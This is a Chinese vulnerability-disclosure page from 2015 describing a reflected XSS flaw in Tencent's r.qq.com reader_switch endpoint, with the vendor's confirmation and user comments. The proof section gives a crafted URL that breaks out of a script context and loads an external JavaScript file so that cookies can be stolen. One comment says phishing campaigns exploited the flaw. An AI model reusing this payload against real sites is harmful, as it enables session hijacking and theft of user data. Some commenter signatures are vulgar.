漏洞概要
关注数(24)
关注此漏洞
漏洞标题:QQ邮箱连接存在xss可直接获取用户敏感信息
相关厂商:腾讯
提交时间:2015-10-07 20:44
修复时间:2015-11-22 15:12
公开时间:2015-11-22 15:12
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:3
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开
简要描述:
QQ邮箱xss 可以直接打cookie!
详细说明:
这两天研究了几下xss,包括某论坛储存型xss。发帖测试被腾讯大大给封号处理。本人觉得很不值,作为一个白帽子感觉心情无比沉重。本人Q号:378433756 请求解封 QQ 。
漏洞证明:
http://r.qq.com/cgi-bin/reader_switch?t=1443888848003&u=http://games.qq.com/ntgame/rss_ntgame.xml?aaaaa%DF%22;%7D;loadJsFile%28%60http://qq.com//qq.js%60%29;function/**/a%28%29%7B//
修复方案:
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2015-10-08 15:11
厂商回复:
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无
漏洞评价:
评论
-
2015-10-08 16:31 |
%230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)
-
2015-10-08 16:48 |
Q1NG ( 普通白帽子 | Rank:101 漏洞数:20 | 临 兵 斗 者 皆 阵 列 前 行 !)
-
2015-10-08 16:51 |
just_joker ( 实习白帽子 | Rank:77 漏洞数:18 | ..........)
-
2015-10-08 17:00 |
socket ( 路人 | Rank:4 漏洞数:2 | socket)
-
2015-10-08 17:11 |
坏男孩-A_A ( 路人 | Rank:8 漏洞数:3 | 菜鸟一枚)
-
2015-10-08 18:29 |
落叶 ( 路人 | Rank:1 漏洞数:2 | xxxx)
xss什么时候就值1 RANk了? 这么不值钱?难道不是啥高级xss?
-
2015-10-08 18:44 |
心云 ( 实习白帽子 | Rank:60 漏洞数:23 | 遇见)
-
2015-10-08 19:50 |
不会游泳的鱼 ( 普通白帽子 | Rank:129 漏洞数:41 | 非著名白帽子)
-
2015-10-08 20:06 |
bobbi ( 路人 | Rank:22 漏洞数:8 | 我没什么爱好 平时就爱撸撸管 看看AV)
-
2015-10-08 20:42 |
撸管 ( 路人 | Rank:6 漏洞数:6 | 别人笑我太猥琐,我笑着朝她猛颜射)
-
2015-10-08 20:43 |
撸管 ( 路人 | Rank:6 漏洞数:6 | 别人笑我太猥琐,我笑着朝她猛颜射)
-
2015-10-08 21:31 |
白无常 ( 实习白帽子 | Rank:55 漏洞数:7 )
-
2015-10-08 21:37 |
泪雨无魂 ( 普通白帽子 | Rank:166 漏洞数:47 )
-
2015-10-08 21:42 |
随风的风 ( 普通白帽子 | Rank:157 漏洞数:53 | 微信公众号:233sec 不定期分享各种漏洞思...)
-
2015-10-09 11:50 |
%230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)
-
2015-10-09 20:28 |
坏男孩-A_A ( 路人 | Rank:8 漏洞数:3 | 菜鸟一枚)
@%230CC 然而我进来了-.- 嘿嘿,你没有被苏州市运输管理处追铺么
-
2015-10-10 11:13 |
%230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)
@坏男孩-A_A ...bu 三声 铺 pu 一声 …… 暂时还米有 哈哈
-
2015-10-10 12:50 |
Ning ( 实习白帽子 | Rank:47 漏洞数:6 )
-
2015-10-10 14:13 |
坏男孩-A_A ( 路人 | Rank:8 漏洞数:3 | 菜鸟一枚)
-
2015-10-10 16:22 |
%230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)
-
2015-10-11 12:12 |
坏男孩-A_A ( 路人 | Rank:8 漏洞数:3 | 菜鸟一枚)
-
2015-10-17 22:54 |
zhxs ( 实习白帽子 | Rank:42 漏洞数:22 | Jyhack-TeaM:http://bbs.jyhack.com/)
-
2015-11-02 14:32 |
CzBiX ( 路人 | Rank:8 漏洞数:2 | CzBiX)
Apple Id 的钓鱼邮件都在用这个洞,现在还没修复。
-
2015-11-09 09:43 |
撸管 ( 路人 | Rank:6 漏洞数:6 | 别人笑我太猥琐,我笑着朝她猛颜射)